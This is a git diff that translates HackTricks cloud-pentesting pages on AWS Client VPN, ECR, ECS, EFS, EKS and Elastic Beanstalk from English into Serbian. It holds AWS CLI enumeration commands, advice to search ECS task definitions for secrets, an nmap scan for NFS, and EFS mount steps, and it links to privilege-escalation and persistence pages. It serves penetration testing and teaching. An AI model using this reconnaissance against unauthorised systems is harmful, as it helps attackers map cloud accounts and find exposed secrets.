-- **Self-service portal:** You can enable a self-service portal for your Client VPN endpoint. Clients can log into the web-based portal using their credentials and download the latest version of the Client VPN endpoint configuration file, or the latest version of the AWS provided client.
+- **Client VPN endpoint:** Resurs koji kreirate i konfigurišete da omogućite i upravljate klijent VPN sesijama. To je resurs gde se završavaju sve klijent VPN sesije.
+- **Target network:** Ciljna mreža je mreža koju povezujete sa Client VPN endpoint-om. **Podmreža iz VPC-a je ciljana mreža**. Povezivanje podmreže sa Client VPN endpoint-om omogućava vam da uspostavite VPN sesije. Možete povezati više podmreža sa Client VPN endpoint-om za visoku dostupnost. Sve podmreže moraju biti iz iste VPC. Svaka podmreža mora pripadati različitoj dostupnoj zoni.
+- **Route**: Svaki Client VPN endpoint ima tabelu ruta koja opisuje dostupne odredišne mrežne rute. Svaka ruta u tabeli ruta specificira putanju za saobraćaj ka određenim resursima ili mrežama.
+- **Authorization rules:** Pravilo autorizacije **ograničava korisnike koji mogu pristupiti mreži**. Za određenu mrežu, konfigurišete Active Directory ili grupu provajdera identiteta (IdP) kojoj je dozvoljen pristup. Samo korisnici koji pripadaju ovoj grupi mogu pristupiti određenoj mreži. **Podrazumevano, nema pravila autorizacije** i morate konfigurisati pravila autorizacije da omogućite korisnicima pristup resursima i mrežama.
+- **Client:** Krajnji korisnik koji se povezuje na Client VPN endpoint da uspostavi VPN sesiju. Krajnji korisnici treba da preuzmu OpenVPN klijent i koriste konfiguracioni fajl Client VPN koji ste kreirali da uspostave VPN sesiju.
+- **Client CIDR range:** Opseg IP adresa iz kojeg se dodeljuju klijentske IP adrese. Svaka veza sa Client VPN endpoint-om dodeljuje jedinstvenu IP adresu iz opsega klijentskog CIDR-a. Birate opseg klijentskog CIDR-a, na primer, `10.2.0.0/16`.
+- **Client VPN ports:** AWS Client VPN podržava portove 443 i 1194 za TCP i UDP. Podrazumevani port je 443.
+- **Client VPN network interfaces:** Kada povežete podmrežu sa vašim Client VPN endpoint-om, kreiramo mrežne interfejse Client VPN u toj podmreži. **Saobraćaj koji se šalje u VPC iz Client VPN endpoint-a šalje se kroz mrežni interfejs Client VPN**. Zatim se primenjuje prevođenje izvorne mrežne adrese (SNAT), gde se izvorna IP adresa iz opsega klijentskog CIDR-a prevodi na IP adresu mrežnog interfejsa Client VPN.
+- **Connection logging:** Možete omogućiti beleženje veza za vaš Client VPN endpoint da zabeležite događaje veze. Ove informacije možete koristiti za forenziku, analizu kako se vaš Client VPN endpoint koristi ili rešavanje problema sa vezama.
+- **Self-service portal:** Možete omogućiti portal za samoposlugu za vaš Client VPN endpoint. Klijenti se mogu prijaviti na web portal koristeći svoje akreditive i preuzeti najnoviju verziju konfiguracionog fajla Client VPN endpoint-a, ili najnoviju verziju klijenta koji pruža AWS.
 
 #### Limitations
 
-- **Client CIDR ranges cannot overlap with the local CIDR** of the VPC in which the associated subnet is located, or any routes manually added to the Client VPN endpoint's route table.
-- Client CIDR ranges must have a block size of at **least /22** and must **not be greater than /12.**
-- A **portion of the addresses** in the client CIDR range are used to **support the availability** model of the Client VPN endpoint, and cannot be assigned to clients. Therefore, we recommend that you **assign a CIDR block that contains twice the number of IP addresses that are required** to enable the maximum number of concurrent connections that you plan to support on the Client VPN endpoint.
-- The **client CIDR range cannot be changed** after you create the Client VPN endpoint.
-- The **subnets** associated with a Client VPN endpoint **must be in the same VPC**.
-- You **cannot associate multiple subnets from the same Availability Zone with a Client VPN endpoint**.
-- A Client VPN endpoint **does not support subnet associations in a dedicated tenancy VPC**.
-- Client VPN supports **IPv4** traffic only.
-- Client VPN is **not** Federal Information Processing Standards (**FIPS**) **compliant**.
-- If multi-factor authentication (MFA) is disabled for your Active Directory, a user password cannot be in the following format.
+- **Client CIDR ranges cannot overlap with the local CIDR** VPC-a u kojem se nalazi povezana podmreža, ili bilo koje rute ručno dodate u tabelu ruta Client VPN endpoint-a.
+- Opsezi klijentskog CIDR-a moraju imati veličinu bloka od **najmanje /22** i ne smeju **biti veći od /12.**
+- **Deo adresa** u opsegu klijentskog CIDR-a se koristi za **podršku modelu dostupnosti** Client VPN endpoint-a i ne može se dodeliti klijentima. Stoga preporučujemo da **dodelite CIDR blok koji sadrži dvostruko više IP adresa koje su potrebne** da omogućite maksimalan broj istovremenih veza koje planirate da podržite na Client VPN endpoint-u.
+- **Opseg klijentskog CIDR-a ne može se promeniti** nakon što kreirate Client VPN endpoint.
+- **Podmreže** povezane sa Client VPN endpoint-om **moraju biti u istom VPC-u**.
+- **Ne možete povezati više podmreža iz iste dostupne zone sa Client VPN endpoint-om**.
+- Client VPN endpoint **ne podržava povezivanje podmreža u VPC-u sa posvećenim zakazivanjem**.
+- Client VPN podržava **IPv4** saobraćaj samo.
+- Client VPN **nije** usklađen sa Federal Information Processing Standards (**FIPS**).
+- Ako je višefaktorska autentifikacija (MFA) onemogućena za vaš Active Directory, lozinka korisnika ne može biti u sledećem formatu.
 
-  ```
-  SCRV1::
-  ```
+```
+SCRV1::
+```
 
-- The self-service portal is **not available for clients that authenticate using mutual authentication**.
+- Portal za samoposlugu **nije dostupan za klijente koji se autentifikuju koristeći međusobnu autentifikaciju**.
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md
index 9025829b4..07b0efe21 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md
@@ -6,49 +6,48 @@
 
 ### ECR
 
-#### Basic Information
+#### Osnovne informacije
 
-Amazon **Elastic Container Registry** (Amazon ECR) is a **managed container image registry service**. It is designed to provide an environment where customers can interact with their container images using well-known interfaces. Specifically, the use of the Docker CLI or any preferred client is supported, enabling activities such as pushing, pulling, and managing container images.
+Amazon **Elastic Container Registry** (Amazon ECR) je **usluga registrovanja slika kontejnera** koja se upravlja. Dizajnirana je da pruži okruženje u kojem kupci mogu da interaguju sa svojim slikama kontejnera koristeći poznate interfejse. Konkretno, podržava se korišćenje Docker CLI-a ili bilo kog preferiranog klijenta, omogućavajući aktivnosti kao što su slanje, preuzimanje i upravljanje slikama kontejnera.
 
-ECR is compose by 2 types of objects: **Registries** and **Repositories**.
+ECR se sastoji od 2 tipa objekata: **Registri** i **Repozitorijumi**.
 
-**Registries**
+**Registri**
 
-Every AWS account has 2 registries: **Private** & **Public**.
+Svaki AWS nalog ima 2 registra: **Privatni** i **Javni**.
 
-1. **Private Registries**:
+1. **Privatni registri**:
 
-- **Private by default**: The container images stored in an Amazon ECR private registry are **only accessible to authorized users** within your AWS account or to those who have been granted permission.
-  - The URI of a **private repository** follows the format `.dkr.ecr..amazonaws.com/`
-- **Access control**: You can **control access** to your private container images using **IAM policies**, and you can configure fine-grained permissions based on users or roles.
-- **Integration with AWS services**: Amazon ECR private registries can be easily **integrated with other AWS services**, such as EKS, ECS...
-- **Other private registry options**:
-  - The Tag immutability column lists its status, if tag immutability is enabled it will **prevent** image **pushes** with **pre-existing tags** from overwriting the images.
-  - The **Encryption type** column lists the encryption properties of the repository, it shows the default encryption types such as AES-256, or has **KMS** enabled encryptions.
-  - The **Pull through cache** column lists its status, if Pull through cache status is Active it will cache **repositories in an external public repository into your private repository**.
-  - Specific **IAM policies** can be configured to grant different **permissions**.
-  - The **scanning configuration** allows to scan for vulnerabilities in the images stored inside the repo.
+- **Privatno po defaultu**: Slike kontejnera smeštene u Amazon ECR privatnom registru su **samo dostupne ovlašćenim korisnicima** unutar vašeg AWS naloga ili onima kojima je data dozvola.
+- URI **privatnog repozitorijuma** prati format `.dkr.ecr..amazonaws.com/`
+- **Kontrola pristupa**: Možete **kontrolisati pristup** svojim privatnim slikama kontejnera koristeći **IAM politike**, i možete konfigurisati precizne dozvole na osnovu korisnika ili uloga.
+- **Integracija sa AWS uslugama**: Amazon ECR privatni registri se mogu lako **integrisati sa drugim AWS uslugama**, kao što su EKS, ECS...
+- **Druge opcije privatnog registra**:
+- Kolona imutabilnosti oznaka prikazuje njen status, ako je imutabilnost oznaka omogućena, ona će **sprečiti** slanje **slika** sa **već postojećim oznakama** da prepisuju slike.
+- Kolona **Tip enkripcije** prikazuje svojstva enkripcije repozitorijuma, prikazuje podrazumevane tipove enkripcije kao što su AES-256, ili ima **KMS** omogućene enkripcije.
+- Kolona **Pull through cache** prikazuje njen status, ako je status Pull through cache Aktivan, on će keširati **repozitorijume u spoljnjem javnom repozitorijumu u vaš privatni repozitorijum**.
+- Specifične **IAM politike** mogu biti konfigurisane da dodele različite **dozvole**.
+- **Konfiguracija skeniranja** omogućava skeniranje na ranjivosti u slikama smeštenim unutar repozitorijuma.
 
-2. **Public Registries**:
+2. **Javni registri**:
 
-- **Public accessibility**: Container images stored in an ECR Public registry are **accessible to anyone on the internet without authentication.**
-  - The URI of a **public repository** is like `public.ecr.aws//`. Although the `` part can be changed by the admin to another string easier to remember.
+- **Javna dostupnost**: Slike kontejnera smeštene u ECR javnom registru su **dostupne svima na internetu bez autentifikacije.**
+- URI **javnog repozitorijuma** je kao `public.ecr.aws//`. Iako deo `` može biti promenjen od strane administratora u drugu string koji je lakši za pamćenje.
 
-**Repositories**
+**Repozitorijumi**
 
-These are the **images** that in the **private registry** or to the **public** one.
+Ovo su **slike** koje se nalaze u **privatnom registru** ili u **javnom**.
 
 > [!NOTE]
-> Note that in order to upload an image to a repository, the **ECR repository need to have the same name as the image**.
+> Imajte na umu da da biste otpremili sliku u repozitorijum, **ECR repozitorijum mora imati isto ime kao slika**.
 
-#### Registry & Repository Policies
+#### Politike registra i repozitorijuma
 
-**Registries & repositories** also have **policies that can be used to grant permissions to other principals/accounts**. For example, in the following repository policy image you can see how any user from the whole organization will be able to access the image:
+**Registri i repozitorijumi** takođe imaju **politike koje se mogu koristiti za dodeljivanje dozvola drugim principima/nalozima**. Na primer, u sledećoj slici politike repozitorijuma možete videti kako bilo koji korisnik iz cele organizacije može pristupiti slici:
 
 

 
-#### Enumeration
-
+#### Enumeracija
 ```bash
 # Get repos
 aws ecr describe-repositories
@@ -68,8 +67,7 @@ aws ecr-public describe-repositories
 aws ecr get-registry-policy
 aws ecr get-repository-policy --repository-name 
 ```
-
-#### Unauthenticated Enum
+#### Neautentifikovana Enum
 
 {{#ref}}
 ../aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md
@@ -77,30 +75,26 @@ aws ecr get-repository-policy --repository-name 
 
 #### Privesc
 
-In the following page you can check how to **abuse ECR permissions to escalate privileges**:
+Na sledećoj stranici možete proveriti kako da **zloupotrebite ECR dozvole za eskalaciju privilegija**:
 
 {{#ref}}
 ../aws-privilege-escalation/aws-ecr-privesc.md
 {{#endref}}
 
-#### Post Exploitation
+#### Post Eksploatacija
 
 {{#ref}}
 ../aws-post-exploitation/aws-ecr-post-exploitation.md
 {{#endref}}
 
-#### Persistence
+#### Perzistencija
 
 {{#ref}}
 ../aws-persistence/aws-ecr-persistence.md
 {{#endref}}
 
-## References
+## Reference
 
 - [https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md
index cbbf596fe..f65122c27 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md
@@ -4,31 +4,30 @@
 
 ## ECS
 
-### Basic Information
+### Osnovne informacije
 
-Amazon **Elastic Container Services** or ECS provides a platform to **host containerized applications in the cloud**. ECS has two **deployment** methods, **EC2** instance type and a **serverless** option, **Fargate**. The service **makes running containers in the cloud very easy and pain free**.
+Amazon **Elastic Container Services** ili ECS pruža platformu za **hostovanje kontejnerizovanih aplikacija u oblaku**. ECS ima dva **metoda implementacije**, tip instance **EC2** i **serverless** opciju, **Fargate**. Usluga **omogućava lako i bezbolno pokretanje kontejnera u oblaku**.
 
-ECS operates using the following three building blocks: **Clusters**, **Services**, and **Task Definitions**.
+ECS funkcioniše koristeći sledeće tri gradivne jedinice: **Klasteri**, **Usluge** i **Definicije zadataka**.
 
-- **Clusters** are **groups of containers** that are running in the cloud. As previously mentioned, there are two launch types for containers, EC2 and Fargate. AWS defines the **EC2** launch type as allowing customers “to run \[their] containerized applications on a cluster of Amazon EC2 instances that \[they] **manage**”. **Fargate** is similar and is defined as “\[allowing] you to run your containerized applications **without the need to provision and manage** the backend infrastructure”.
-- **Services** are created inside a cluster and responsible for **running the tasks**. Inside a service definition **you define the number of tasks to run, auto scaling, capacity provider (Fargate/EC2/External),** **networking** information such as VPC’s, subnets, and security groups.
-  - There **2 types of applications**:
-    - **Service**: A group of tasks handling a long-running computing work that can be stopped and restarted. For example, a web application.
-    - **Task**: A standalone task that runs and terminates. For example, a batch job.
-  - Among the service applications, there are **2 types of service schedulers**:
-    - [**REPLICA**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): The replica scheduling strategy places and **maintains the desired number** of tasks across your cluster. If for some reason a task shut down, a new one is launched in the same or different node.
-    - [**DAEMON**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): Deploys exactly one task on each active container instance that has the needed requirements. There is no need to specify a desired number of tasks, a task placement strategy, or use Service Auto Scaling policies.
-- **Task Definitions** are responsible for **defining what containers will run** and the various parameters that will be configured with the containers such as **port mappings** with the host, **env variables**, Docker **entrypoint**...
-  - Check **env variables for sensitive info**!
+- **Klasteri** su **grupe kontejnera** koji se pokreću u oblaku. Kao što je ranije pomenuto, postoje dva tipa pokretanja za kontejnere, EC2 i Fargate. AWS definiše tip pokretanja **EC2** kao omogućavanje kupcima “da pokreću \[svoje] kontejnerizovane aplikacije na klasteru Amazon EC2 instanci koje \[oni] **upravljaju**”. **Fargate** je sličan i definisan je kao “\[omogućava] vam da pokrećete svoje kontejnerizovane aplikacije **bez potrebe za obezbeđivanjem i upravljanjem** pozadinskom infrastrukturom”.
+- **Usluge** se kreiraju unutar klastera i odgovorne su za **pokretanje zadataka**. Unutar definicije usluge **definišete broj zadataka koji će se pokrenuti, automatsko skaliranje, provajder kapaciteta (Fargate/EC2/Spoljašnji),** **informacije o umrežavanju** kao što su VPC, podmreže i sigurnosne grupe.
+- Postoje **2 tipa aplikacija**:
+- **Usluga**: Grupa zadataka koja se bavi dugotrajnim računski zahtevnim radom koji se može zaustaviti i ponovo pokrenuti. Na primer, web aplikacija.
+- **Zadatak**: Samostalni zadatak koji se pokreće i završava. Na primer, batch posao.
+- Među aplikacijama usluga, postoje **2 tipa raspoređivača usluga**:
+- [**REPLICA**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): Strategija raspoređivanja replika postavlja i **održava željeni broj** zadataka širom vašeg klastera. Ako iz nekog razloga zadatak prestane sa radom, novi se pokreće na istom ili drugom čvoru.
+- [**DAEMON**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): Raspoređuje tačno jedan zadatak na svakoj aktivnoj instanci kontejnera koja ima potrebne zahteve. Nema potrebe da se specificira željeni broj zadataka, strategija postavljanja zadataka ili korišćenje politika automatskog skaliranja usluga.
+- **Definicije zadataka** su odgovorne za **definisanje koji će kontejneri raditi** i razne parametre koji će biti konfigurisani sa kontejnerima kao što su **mapiranja portova** sa hostom, **env varijable**, Docker **entrypoint**...
+- Proverite **env varijable za osetljive informacije**!
 
-### Sensitive Data In Task Definitions
+### Osetljivi podaci u definicijama zadataka
 
-Task definitions are responsible for **configuring the actual containers that will be running in ECS**. Since task definitions define how containers will run, a plethora of information can be found within.
+Definicije zadataka su odgovorne za **konfigurisanje stvarnih kontejnera koji će se pokretati u ECS**. Pošto definicije zadataka definišu kako će kontejneri raditi, unutar njih se može naći obilje informacija.
 
-Pacu can enumerate ECS (list-clusters, list-container-instances, list-services, list-task-definitions), it can also dump task definitions.
-
-### Enumeration
+Pacu može enumerisati ECS (list-clusters, list-container-instances, list-services, list-task-definitions), takođe može izbaciti definicije zadataka.
 
+### Enumeracija
 ```bash
 # Clusters info
 aws ecs list-clusters
@@ -52,35 +51,30 @@ aws ecs describe-tasks --cluster  --tasks 
 ## Look for env vars and secrets used from the task definition
 aws ecs describe-task-definition --task-definition :
 ```
-
-### Unauthenticated Access
+### Neautentifikovani Pristup
 
 {{#ref}}
 ../aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md
 {{#endref}}
 
-### Privesc
+### Eskalacija Privilegija
 
-In the following page you can check how to **abuse ECS permissions to escalate privileges**:
+Na sledećoj stranici možete proveriti kako da **zloupotrebite ECS dozvole za eskalaciju privilegija**:
 
 {{#ref}}
 ../aws-privilege-escalation/aws-ecs-privesc.md
 {{#endref}}
 
-### Post Exploitation
+### Post Eksploatacija
 
 {{#ref}}
 ../aws-post-exploitation/aws-ecs-post-exploitation.md
 {{#endref}}
 
-### Persistence
+### Postojanost
 
 {{#ref}}
 ../aws-persistence/aws-ecs-persistence.md
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md
index bcf4e58d4..9a0b0372e 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md
@@ -4,22 +4,21 @@
 
 ## EFS
 
-### Basic Information
+### Osnovne informacije
 
-Amazon Elastic File System (EFS) is presented as a **fully managed, scalable, and elastic network file system** by AWS. The service facilitates the creation and configuration of **file systems** that can be concurrently accessed by multiple EC2 instances and other AWS services. The key features of EFS include its ability to automatically scale without manual intervention, provision low-latency access, support high-throughput workloads, guarantee data durability, and seamlessly integrate with various AWS security mechanisms.
+Amazon Elastic File System (EFS) se predstavlja kao **potpuno upravljani, skalabilni i elastični mrežni fajl sistem** od strane AWS-a. Usluga olakšava kreiranje i konfiguraciju **fajl sistema** koji mogu istovremeno da budu dostupni više EC2 instancama i drugim AWS uslugama. Ključne karakteristike EFS-a uključuju njegovu sposobnost da se automatski skalira bez manuelne intervencije, obezbedi pristup sa niskom latencijom, podrži visoko-protokne radne opterećenja, garantuje trajnost podataka i besprekorno se integriše sa raznim AWS bezbednosnim mehanizmima.
 
-By **default**, the EFS folder to mount will be **`/`** but it could have a **different name**.
+Po **default-u**, EFS folder koji će se montirati biće **`/`** ali može imati **drugo ime**.
 
-### Network Access
+### Mrežni pristup
 
-An EFS is created in a VPC and would be **by default accessible in all the VPC subnetworks**. However, the EFS will have a Security Group. In order to **give access to an EC2** (or any other AWS service) to mount the EFS, it’s needed to **allow in the EFS security group an inbound NFS** (2049 port) **rule from the EC2 Security Group**.
+EFS se kreira u VPC-u i biće **po default-u dostupan u svim VPC podmrežama**. Međutim, EFS će imati Bezbednosnu Grupu. Da bi se **omogućio pristup EC2** (ili bilo kojoj drugoj AWS usluzi) za montiranje EFS-a, potrebno je **dozvoliti u EFS bezbednosnoj grupi dolaznu NFS** (port 2049) **pravilo iz EC2 Bezbednosne Grupe**.
 
-Without this, you **won't be able to contact the NFS service**.
+Bez ovoga, **nećete moći da kontaktirate NFS uslugu**.
 
-For more information about how to do this check: [https://stackoverflow.com/questions/38632222/aws-efs-connection-timeout-at-mount](https://stackoverflow.com/questions/38632222/aws-efs-connection-timeout-at-mount)
-
-### Enumeration
+Za više informacija o tome kako to uraditi, pogledajte: [https://stackoverflow.com/questions/38632222/aws-efs-connection-timeout-at-mount](https://stackoverflow.com/questions/38632222/aws-efs-connection-timeout-at-mount)
 
+### Enumeracija
 ```bash
 # Get filesystems and access policies (if any)
 aws efs describe-file-systems
@@ -39,12 +38,10 @@ aws efs describe-replication-configurations
 # Search for NFS in EC2 networks
 sudo nmap -T4 -Pn -p 2049 --open 10.10.10.0/20 # or /16 to be sure
 ```
-
 > [!CAUTION]
-> It might be that the EFS mount point is inside the same VPC but in a different subnet. If you want to be sure you find all **EFS points it would be better to scan the `/16` netmask**.
-
-### Mount EFS
+> Može se desiti da je EFS tačka montiranja unutar iste VPC, ali u različitom podmreži. Ako želite da budete sigurni da ste pronašli sve **EFS tačke, bilo bi bolje skenirati `/16` netmasku**.
 
+### Montiranje EFS
 ```bash
 sudo mkdir /efs
 
@@ -58,70 +55,63 @@ sudo yum install amazon-efs-utils # If centos
 sudo apt-get install amazon-efs-utils # If ubuntu
 sudo mount -t efs :/ /efs/
 ```
-
 ### IAM Access
 
-By **default** anyone with **network access to the EFS** will be able to mount, **read and write it even as root user**. However, File System policies could be in place **only allowing principals with specific permissions** to access it.\
-For example, this File System policy **won't allow even to mount** the file system if you **don't have the IAM permission**:
-
+Po **default-u**, svako ko ima **mrežni pristup EFS-u** moći će da montira, **čita i piše čak i kao root korisnik**. Međutim, politike datotečnog sistema mogu biti postavljene **samo za omogućavanje pristupa principima sa specifičnim dozvolama**.\
+Na primer, ova politika datotečnog sistema **neće dozvoliti čak ni montiranje** datotečnog sistema ako **nemate IAM dozvolu**:
 ```json
 {
-  "Version": "2012-10-17",
-  "Id": "efs-policy-wizard-2ca2ba76-5d83-40be-8557-8f6c19eaa797",
-  "Statement": [
-    {
-      "Sid": "efs-statement-e7f4b04c-ad75-4a7f-a316-4e5d12f0dbf5",
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "*"
-      },
-      "Action": "",
-      "Resource": "arn:aws:elasticfilesystem:us-east-1:318142138553:file-system/fs-0ab66ad201b58a018",
-      "Condition": {
-        "Bool": {
-          "elasticfilesystem:AccessedViaMountTarget": "true"
-        }
-      }
-    }
-  ]
+"Version": "2012-10-17",
+"Id": "efs-policy-wizard-2ca2ba76-5d83-40be-8557-8f6c19eaa797",
+"Statement": [
+{
+"Sid": "efs-statement-e7f4b04c-ad75-4a7f-a316-4e5d12f0dbf5",
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": "",
+"Resource": "arn:aws:elasticfilesystem:us-east-1:318142138553:file-system/fs-0ab66ad201b58a018",
+"Condition": {
+"Bool": {
+"elasticfilesystem:AccessedViaMountTarget": "true"
+}
+}
+}
+]
 }
 ```
-
-Or this will **prevent anonymous access**:
+Ili će ovo **sprečiti anonimni pristup**:
 
 

 
-Note that to mount file systems protected by IAM you MUST use the type "efs" in the mount command:
-
+Imajte na umu da da biste montirali datotečne sisteme zaštićene IAM-om, MORATE koristiti tip "efs" u komandi za montiranje:
 ```bash
 sudo mkdir /efs
 sudo mount -t efs -o tls,iam  :/ /efs/
 # To use a different pforile from ~/.aws/credentials
 # You can use: -o tls,iam,awsprofile=namedprofile
 ```
-
 ### Access Points
 
-**Access points** are **application**-specific entry points **into an EFS file system** that make it easier to manage application access to shared datasets.
+**Access points** su **specifični ulazni** tačke **u EFS datotečnom sistemu** koje olakšavaju upravljanje pristupom aplikacija deljenim skupovima podataka.
 
-When you create an access point, you can **specify the owner and POSIX permissions** for the files and directories created through the access point. You can also **define a custom root directory** for the access point, either by specifying an existing directory or by creating a new one with the desired permissions. This allows you to **control access to your EFS file system on a per-application or per-user basis**, making it easier to manage and secure your shared file data.
-
-**You can mount the File System from an access point with something like:**
+Kada kreirate access point, možete **odrediti vlasnika i POSIX dozvole** za datoteke i direktorijume kreirane putem access point-a. Takođe možete **definisati prilagođeni korenski direktorijum** za access point, bilo tako što ćete odrediti postojeći direktorijum ili kreirati novi sa željenim dozvolama. Ovo vam omogućava da **kontrolišete pristup vašem EFS datotečnom sistemu po aplikaciji ili po korisniku**, što olakšava upravljanje i obezbeđivanje vaših deljenih datoteka.
 
+**Možete montirati datotečni sistem sa access point-a koristeći nešto poput:**
 ```bash
 # Use IAM if you need to use iam permissions
 sudo mount -t efs -o tls,[iam],accesspoint= \
-     /efs/
+ /efs/
 ```
-
 > [!WARNING]
-> Note that even trying to mount an access point you still need to be able to **contact the NFS service via network**, and if the EFS has a file system **policy**, you need **enough IAM permissions** to mount it.
+> Imajte na umu da čak i pokušaj montiranja pristupne tačke zahteva da **kontaktirate NFS servis putem mreže**, a ako EFS ima **politiku** datotečnog sistema, potrebne su vam **dovoljne IAM dozvole** za montiranje.
 
-Access points can be used for the following purposes:
+Pristupne tačke mogu se koristiti u sledeće svrhe:
 
-- **Simplify permissions management**: By defining a POSIX user and group for each access point, you can easily manage access permissions for different applications or users without modifying the underlying file system's permissions.
-- **Enforce a root directory**: Access points can restrict access to a specific directory within the EFS file system, ensuring that each application or user operates within its designated folder. This helps prevent accidental data exposure or modification.
-- **Easier file system access**: Access points can be associated with an AWS Lambda function or an AWS Fargate task, simplifying file system access for serverless and containerized applications.
+- **Pojednostavljenje upravljanja dozvolama**: Definisanjem POSIX korisnika i grupe za svaku pristupnu tačku, možete lako upravljati dozvolama pristupa za različite aplikacije ili korisnike bez modifikovanja dozvola osnovnog datotečnog sistema.
+- **Sprovođenje root direktorijuma**: Pristupne tačke mogu ograničiti pristup određenom direktorijumu unutar EFS datotečnog sistema, osiguravajući da svaka aplikacija ili korisnik radi unutar svog dodeljenog foldera. Ovo pomaže u sprečavanju slučajnog izlaganja ili modifikacije podataka.
+- **Lakši pristup datotečnom sistemu**: Pristupne tačke mogu biti povezane sa AWS Lambda funkcijom ili AWS Fargate zadatkom, pojednostavljujući pristup datotečnom sistemu za serverless i kontejnerizovane aplikacije.
 
 ## Privesc
 
@@ -142,7 +132,3 @@ Access points can be used for the following purposes:
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md
index a7ead6d10..73b96e659 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md
@@ -4,17 +4,16 @@
 
 ## EKS
 
-Amazon Elastic Kubernetes Service (Amazon EKS) is designed to eliminate the need for users to install, operate, and manage their own Kubernetes control plane or nodes. Instead, Amazon EKS manages these components, providing a simplified way to deploy, manage, and scale containerized applications using Kubernetes on AWS.
+Amazon Elastic Kubernetes Service (Amazon EKS) je dizajniran da eliminiše potrebu za korisnicima da instaliraju, upravljaju i održavaju svoj vlastiti Kubernetes kontrolni sistem ili čvorove. Umesto toga, Amazon EKS upravlja ovim komponentama, pružajući pojednostavljen način za implementaciju, upravljanje i skaliranje kontejnerizovanih aplikacija koristeći Kubernetes na AWS-u.
 
-Key aspects of Amazon EKS include:
+Ključni aspekti Amazon EKS uključuju:
 
-1. **Managed Kubernetes Control Plane**: Amazon EKS automates critical tasks such as patching, node provisioning, and updates.
-2. **Integration with AWS Services**: It offers seamless integration with AWS services for compute, storage, database, and security.
-3. **Scalability and Security**: Amazon EKS is designed to be highly available and secure, providing features such as automatic scaling and isolation by design.
-4. **Compatibility with Kubernetes**: Applications running on Amazon EKS are fully compatible with applications running on any standard Kubernetes environment.
+1. **Upravljani Kubernetes kontrolni sistem**: Amazon EKS automatizuje kritične zadatke kao što su zakrpe, obezbeđivanje čvorova i ažuriranja.
+2. **Integracija sa AWS uslugama**: Pruža besprekornu integraciju sa AWS uslugama za računanje, skladištenje, baze podataka i bezbednost.
+3. **Skalabilnost i bezbednost**: Amazon EKS je dizajniran da bude visoko dostupan i siguran, pružajući funkcije kao što su automatsko skaliranje i izolacija po dizajnu.
+4. **Kompatibilnost sa Kubernetes**: Aplikacije koje rade na Amazon EKS su potpuno kompatibilne sa aplikacijama koje rade u bilo kojem standardnom Kubernetes okruženju.
 
 #### Enumeration
-
 ```bash
 aws eks list-clusters
 aws eks describe-cluster --name 
@@ -32,7 +31,6 @@ aws eks describe-nodegroup --cluster-name  --nodegroup-name 
 aws eks list-updates --name 
 aws eks describe-update --name  --update-id 
 ```
-
 #### Post Exploitation
 
 {{#ref}}
@@ -44,7 +42,3 @@ aws eks describe-update --name  --update-id 
 - [https://aws.amazon.com/eks/](https://aws.amazon.com/eks/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md
index 980504dac..c3b3bea75 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md
@@ -4,70 +4,69 @@
 
 ## Elastic Beanstalk
 
-Amazon Elastic Beanstalk provides a simplified platform for **deploying, managing, and scaling web applications and services**. It supports a variety of programming languages and frameworks, such as Java, .NET, PHP, Node.js, Python, Ruby, and Go, as well as Docker containers. The service is compatible with widely-used servers including Apache, Nginx, Passenger, and IIS.
+Amazon Elastic Beanstalk pruža pojednostavljenu platformu za **implementaciju, upravljanje i skaliranje web aplikacija i usluga**. Podržava razne programske jezike i okvire, kao što su Java, .NET, PHP, Node.js, Python, Ruby i Go, kao i Docker kontejnere. Usluga je kompatibilna sa široko korišćenim serverima uključujući Apache, Nginx, Passenger i IIS.
 
-Elastic Beanstalk provides a simple and flexible way to **deploy your applications to the AWS cloud**, without the need to worry about the underlying infrastructure. It **automatically** handles the details of capacity **provisioning**, load **balancing**, **scaling**, and application health **monitoring**, allowing you to focus on writing and deploying your code.
